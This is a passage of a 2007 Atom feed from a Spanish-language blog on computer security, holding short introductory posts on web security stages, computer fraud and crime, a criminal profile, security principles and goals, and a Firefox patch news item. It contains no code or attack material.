src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-4004640497825658812</id><published>2007-11-29T16:10:00.000-03:00</published><updated>2008-12-10T12:34:00.631-02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Seguridad en la Web'/><title type='text'>Seguridad en la Web - Introducción</title><content type='html'>&lt;a href="http://3.bp.blogspot.com/_nams9blykQY/R08R8niTpEI/AAAAAAAAAAM/_HMhCR2j53o/s1600-h/images"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://3.bp.blogspot.com/_nams9blykQY/R08R8niTpEI/AAAAAAAAAAM/_HMhCR2j53o/s320/images" alt="" id="BLOGGER_PHOTO_ID_5138345432955724866" border="0" /&gt;&lt;/a&gt;La seguridad en web tiene 3 etapas primarias:&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;1)&lt;/strong&gt; Seguridad de la computadora del usuario&lt;br /&gt;&lt;strong&gt;2)&lt;/strong&gt; Seguridad del servidor web y de los datos almacenados ahí&lt;br /&gt;&lt;strong&gt;3)&lt;/strong&gt; Seguridad de la información que viaja entre el servidor web y el usuario&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Seguridad de la computadora del usuario &lt;/strong&gt;&lt;br /&gt;Los usuarios deben contar con navegadores y plataformas seguras, libres de virus y vulnerabilidades. También debe garantizarse la privacidad de los datos del usuario.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Seguridad del servidor web y de los datos almacenados ahí &lt;/strong&gt;&lt;br /&gt;Se debe garantizar la operación continua del servidor, que los datos no sean modificados sin autorización (integridad) y que la información sólo sea distribuida a las personas autorizadas (control de acceso).&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Seguridad de la información que viaja entre el servidor web y el usuario &lt;/strong&gt;&lt;br /&gt;Garantizar que la información en tránsito no sea leída (confidencialidad), modificada o destruida por terceros. También es importante asegurar que el enlace entre cliente y servidor no pueda interrumpirse fácilmente (disponibilidad).&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-4004640497825658812?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/4004640497825658812/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=4004640497825658812&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4004640497825658812'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/4004640497825658812'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/11/introduccin.html' title='Seguridad en la Web - Introducción'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_nams9blykQY/R08R8niTpEI/AAAAAAAAAAM/_HMhCR2j53o/s72-c/images' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-5135839222744651749</id><published>2007-11-29T13:41:00.000-03:00</published><updated>2007-11-29T13:45:58.648-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Conceptos / Definiciones'/><title type='text'>Fraudes Informáticos</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.antispam.br/images/ilust-fraudes.png"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 200px;" src="http://www.antispam.br/images/ilust-fraudes.png" alt="" border="0" /&gt;&lt;/a&gt;Para entender mejor, se pueden clasificar los fraudes que se cometen en los sistemas informáticos, o sea las acciones que conducen al delito y, consecuentemente, al perjuicio económico de alguien por quien perpetra el fraude. Los más comunes son:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Manipulación indebida, falsificación o alteración de registros y documentos.&lt;/li&gt;&lt;li&gt;Supresión u omisión de los efectos de la transacción en los registros o documentos.&lt;/li&gt;&lt;li&gt;Registración de transacciones inexistentes.&lt;/li&gt;&lt;li&gt;Uso indebido de las políticas contables.&lt;/li&gt;&lt;li&gt;Malversación de los activos.&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-5135839222744651749?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/5135839222744651749/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=5135839222744651749&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5135839222744651749'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/5135839222744651749'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/11/fraudes-informticos.html' title='Fraudes Informáticos'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-3295603372692993734</id><published>2007-11-28T01:12:00.000-03:00</published><updated>2007-11-28T01:19:39.838-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Conceptos / Definiciones'/><title type='text'>Perfíl del Delincuente Informático</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://mentiraspiadosas.bitacoras.com/images/hackers.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 171px; height: 171px;" src="http://mentiraspiadosas.bitacoras.com/images/hackers.jpg" alt="" border="0" /&gt;&lt;/a&gt;Dado que los delitos que se cometen son nuevos, su perfil también lo es. En general tienen las siguientes características:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;&lt;span&gt;N&lt;/span&gt;&lt;/span&gt;o tienen antecedentes delictivos previos en otros rubros.&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;&lt;span&gt;E&lt;/span&gt;&lt;/span&gt;n su gran mayoría son varones; las mujeres se encuentran implicadas sólo a nivel de complicidad.&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;E&lt;/span&gt;l rango de edad está entre los 18 y 30 años.&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;P&lt;/span&gt;ocas veces actúan en asociación, suele haber un solo ejecutor y  a lo sumo una o dos personas de apoyo.&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;T&lt;/span&gt;odos tienen un conocimiento altamente especializado.&lt;/li&gt;&lt;li&gt;&lt;span style="font-size:100%;"&gt;S&lt;/span&gt;uelen comenzar como un desafío a los límites que pone el computador para su acceso y luego derivan al delito económico.&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-3295603372692993734?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/3295603372692993734/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=3295603372692993734&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/3295603372692993734'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/3295603372692993734'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/11/perfl-del-delincuente-informtico.html' title='Perfíl del Delincuente Informático'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-2440628247616001527</id><published>2007-11-28T01:05:00.000-03:00</published><updated>2007-11-28T01:10:19.695-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Conceptos / Definiciones'/><title type='text'>Delito Informático</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.clarin.com/diario/2005/04/03/thumb/t060dh02.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 156px; height: 121px;" src="http://www.clarin.com/diario/2005/04/03/thumb/t060dh02.jpg" alt="" border="0" /&gt;&lt;/a&gt;Con el término &lt;span style="font-weight: bold;"&gt;Delito Informático&lt;/span&gt; aglutinamos los hechos que, basándose en técnicas o mecanismos informáticos, pudieren ser tipificados como delito en el Código Penal, tales como: delito de estafa, delito contra la propiedad intelectual e industrial, etc. Debido a los avances tecnológicos y a los nuevos mecanismos para delinquir se ha hecho necesario introducir y modificar determinados artículos que permitan aglutinar éstos.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-2440628247616001527?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/2440628247616001527/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=2440628247616001527&amp;isPopup=true' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2440628247616001527'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2440628247616001527'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/11/delito-informtico.html' title='Delito Informático'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-862142949647814305</id><published>2007-11-27T23:14:00.000-03:00</published><updated>2007-11-27T23:16:59.667-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Noticias'/><title type='text'>Nuevo Firefox 2.0.0.10 corrige tres vulnerabilidades</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://files.myopera.com/yerko/blog/b_mozilla_firefox.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 104px; height: 103px;" src="http://files.myopera.com/yerko/blog/b_mozilla_firefox.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;Mozilla&lt;/span&gt; ha presentado hoy la versión &lt;a href="http://www.mozilla.com/en-US/firefox/all.html" rel="nofollow"&gt;2.0.0.10&lt;/a&gt; de Firefox que corrige &lt;a href="http://www.mozilla.org/projects/security/known-vulnerabilities.html#firefox2.0.0.10" rel="nofollow"&gt;tres vulnerabilidades&lt;/a&gt;, entre ellas la del &lt;a href="http://www.kriptopolis.org/nuevo-fallo-firefox-amenaza-gmail-2" rel="nofollow"&gt;manejo de esquemas jar&lt;/a&gt;, que afectaba al navegador desde hace diez meses.&lt;br /&gt;&lt;br /&gt;fuentes: &lt;a href="http://www.kriptopolis.org/firefox-2.0.0.10-repara-tres-vulnerabilidades"&gt;Kriptopolis&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-862142949647814305?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/862142949647814305/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=862142949647814305&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/862142949647814305'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/862142949647814305'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/11/nuevo-firefox-20010-corrige-tres.html' title='Nuevo Firefox 2.0.0.10 corrige tres vulnerabilidades'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-2050923147389738715</id><published>2007-11-26T02:24:00.000-03:00</published><updated>2007-11-26T02:31:17.314-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Conceptos / Definiciones'/><title type='text'>Amenazas, Vulnerabilidadades y Ataques</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://infoera.cl/wp-content/uploads/2007/05/virus-worm.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 249px; height: 196px;" src="http://infoera.cl/wp-content/uploads/2007/05/virus-worm.jpg" alt="" border="0" /&gt;&lt;/a&gt;El concepto de &lt;span style="font-weight: bold;"&gt;Amenazas&lt;/span&gt; en informática determinan cuáles deben ser las orientaciones de las medidas de seguridad a adoptar. El grado de susceptibilidad y el efecto que un sistema informático tiene cuando la &lt;span style="font-weight: bold;"&gt;Amenaza&lt;/span&gt; se convierte en realidad es lo que llamamos &lt;span style="font-weight: bold;"&gt;Vulnerabilidad&lt;/span&gt;. Ahora bien las &lt;span style="font-weight: bold;"&gt;Amenazas&lt;/span&gt; se convierte en realidad a través de un &lt;span style="font-weight: bold;"&gt;Ataques&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;De acuerdo al estado actual de la tecnología, se pueden conjugar estos tres elementos para formar una tabla orientativa.&lt;br /&gt;&lt;br /&gt;Los &lt;span style="font-style: italic;"&gt;Riesgos&lt;/span&gt; en general no sólo están dados por la presencia de personas que perpetran los delitos sino por la ineficiencia generada por una mala administración o por un deficiente diseño y mantenimiento de los Sistemas que no consideran esta posibilidad.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-2050923147389738715?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/2050923147389738715/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=2050923147389738715&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2050923147389738715'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/2050923147389738715'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/11/amenazas-vulnerabilidadades-y-ataques.html' title='Amenazas, Vulnerabilidadades y Ataques'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-1412406686164948867</id><published>2007-11-25T00:16:00.000-03:00</published><updated>2007-11-25T00:24:19.384-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Conceptos / Definiciones'/><title type='text'>Los 3 principios de la Seguridad Informática</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.itprofessionals.es/imagesnoticias/CD_locked.jpg"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 200px;" src="http://www.itprofessionals.es/imagesnoticias/CD_locked.jpg" alt="" border="0" /&gt;&lt;/a&gt;Este punto es muy importante conocerlos, principios muy simples de entenderlos y aplicarlos.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Principio 1:&lt;/span&gt; &lt;span style="font-style: italic;"&gt;"El intruso al sistema intentará cualquier artilugio que haga más fácil su acceso y posterior ataque. El ataque siempre se realizará en el punto débil"&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Principio 2:&lt;/span&gt; &lt;span style="font-style: italic;"&gt;"Los datos deben protegerse sólo hasta que pierdan su valor"&lt;/span&gt;. Este caso se ve en los grandes sistemas que proporcionan muchos datos procesados, quizás estos tengan valor para el usuario solo hasta un determinado momento, luego van perdiendo importancia.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Principio 3:&lt;/span&gt; &lt;span style="font-style: italic;"&gt;"Las medidas de control que se implementen deben ser efectivas, eficientes, fáciles de usar y apropiadas al medio"&lt;/span&gt;. Estas medidas deben funcionar en el momento oportuno y deben ser actualizados periódicamente, de lo contrario pasaría a ser un gasto inútil.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-1412406686164948867?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/1412406686164948867/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=1412406686164948867&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/1412406686164948867'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/1412406686164948867'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/11/los-3-principios-de-la-seguridad.html' title='Los 3 principios de la Seguridad Informática'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-228111760628836201</id><published>2007-11-24T15:22:00.000-03:00</published><updated>2007-11-24T23:59:30.258-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Conceptos / Definiciones'/><title type='text'>Seguridad Activa y Pasiva</title><content type='html'>&lt;span style="font-weight: bold;"&gt;Seguridad  Activa:&lt;/span&gt; es aquella cuyas medidas tienen como objetivo anular o reducir los  riesgos existentes o sus consecuencias para el sistema; ejemplo &lt;span style="font-style: italic;"&gt;antivirus&lt;/span&gt;, &lt;span style="font-style: italic;"&gt;firewall&lt;/span&gt;, etc.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Seguridad  Pasiva:&lt;/span&gt; es aquella que prepara al sistema para el caso en que el desastre  que amenazaba el riesgo se haya producido; ejemplo, &lt;span style="font-style: italic;"&gt;sistemas de  back-up&lt;/span&gt;.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-228111760628836201?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/228111760628836201/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=228111760628836201&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/228111760628836201'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/228111760628836201'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/11/seguridad-activa-y-pasiva.html' title='Seguridad Activa y Pasiva'/><author><name>Barnisimo</name><uri>http://www.blogger.com/profile/01972106911791737364</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-247585307826019117</id><published>2007-11-24T11:43:00.000-03:00</published><updated>2007-11-24T11:50:44.196-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Conceptos / Definiciones'/><title type='text'>Seguridad Física y Lógica</title><content type='html'>&lt;span style="font-weight: bold;"&gt;Seguridad Física:&lt;/span&gt; Este concepto hace referencia a la protección frente a las amenazas físicas de las instalaciones, equipos, datos, software de base y aplicativos, personal y documentación fundamentalmente. Para ello se recomienda realizar un &lt;span style="font-style: italic;"&gt;diseño de las instalaciones&lt;/span&gt;, &lt;span style="font-style: italic;"&gt;restricción de acceso de personal al área de sistemas&lt;/span&gt;, &lt;span style="font-style: italic;"&gt;implementar un plan de Backup para los datos&lt;/span&gt;, etc.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Seguridad Lógica:&lt;/span&gt; Básicamente es la protección de la información, en su propio medio contra robo o destrucción, copia o difusión. Para ellos puede usarse la &lt;span style="font-style: italic;"&gt;Criptografía&lt;/span&gt;, &lt;span style="font-style: italic;"&gt;Firma Digital&lt;/span&gt;, &lt;span style="font-style: italic;"&gt;Administración de Seguridad&lt;/span&gt; y &lt;span style="font-style: italic;"&gt;limitaciones de Accesibilidad a los usuarios&lt;/span&gt;, más adelante veremos estos conceptos en profundidad.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-247585307826019117?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/247585307826019117/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=247585307826019117&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/247585307826019117'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/247585307826019117'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/11/seguridad-fsica-y-lgica.html' title='Seguridad Física y Lógica'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-7851449389200767577</id><published>2007-11-23T23:35:00.000-03:00</published><updated>2007-11-23T23:58:11.793-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Conceptos / Definiciones'/><title type='text'>Objetivos de la Seguridad Informática</title><content type='html'>Básicamente los Objetivos de la Seguridad Informática se pueden resumir como los siguientes:&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Confidencialidad&lt;/span&gt;: Que la información llegue en cantidad, calidad y oportunidad sólo y a todos los que está previsto.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Integridad&lt;/span&gt;: Se refiere a que la información producida tiene los contenidos en calidad y cantidad con que fue diseñada (contrario a fraude).&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Disponibilidad&lt;/span&gt;: Es la oportunidad en la cual se dispone de la información. Completa el concepto de Integridad.&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
&lt;a href="http://seguridadsegura.blogspot.com"&gt;Seguridad Segura&lt;/a&gt; | Security safe.
[ Seguridad Web - Servidores - Virus - Troyanos - Criptografía - Herramientas - Hackers - Crackers ]&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/777753328493010232-7851449389200767577?l=seguridadsegura.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://seguridadsegura.blogspot.com/feeds/7851449389200767577/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=777753328493010232&amp;postID=7851449389200767577&amp;isPopup=true' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7851449389200767577'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/777753328493010232/posts/default/7851449389200767577'/><link rel='alternate' type='text/html' href='http://seguridadsegura.blogspot.com/2007/11/objetivos-de-la-seguridad-informtica.html' title='Objetivos de la Seguridad Informática'/><author><name>Daniel M. Maldonado</name><uri>http://www.blogger.com/profile/08463520473424685645</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-777753328493010232.post-7663586511235477636</id><published>2007-11-23T23:23:00.000-03:00</published><updated>2007-11-23T23:28:11.966-03:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Conceptos / Definiciones'/><title type='text'>Importancia de las Fallas Informáticas</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.iutcaripito.tec.ve/Informatica/informatica.jpg"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 183px; height: 155px;" src="http://www.iutcaripito.tec.ve/Informatica/informatica.jpg" alt="" border="0" /&gt;&lt;/a&gt;Porqué es tan importante contemplar estas fallas:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Por la multiplicidad de uso de los sistemas informáticos, que abarcan prácticamente todo el espectro administrativo técnico de una empresa.&lt;/li&gt;&lt;li&gt;Por la falta de los procedimientos alternativos, que normalmente se desechan al implementar Sistemas informatizados.&lt;/li&gt;&lt;li&gt;Por el software amigable, que da acceso a informaciones y procesos importantes a quienes no siempre están capacitados para usarlos.&lt;/li&gt;&lt;li&gt;Por la expansión del propio trabajo, lo cual implica una mayor dificultad en el control al disponerse de herramientas que no se dominan totalmente.&lt;/li&gt;&lt;li&gt;Por el fácil acceso a grandes volúmenes de información, lo que produce la dicotomía de limitarlo y perder eficiencia o liberarlo y dejar la Seguridad al albedrío del usuario.&lt;/li&gt;&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;&lt;hr /&gt;&amp;copy; 
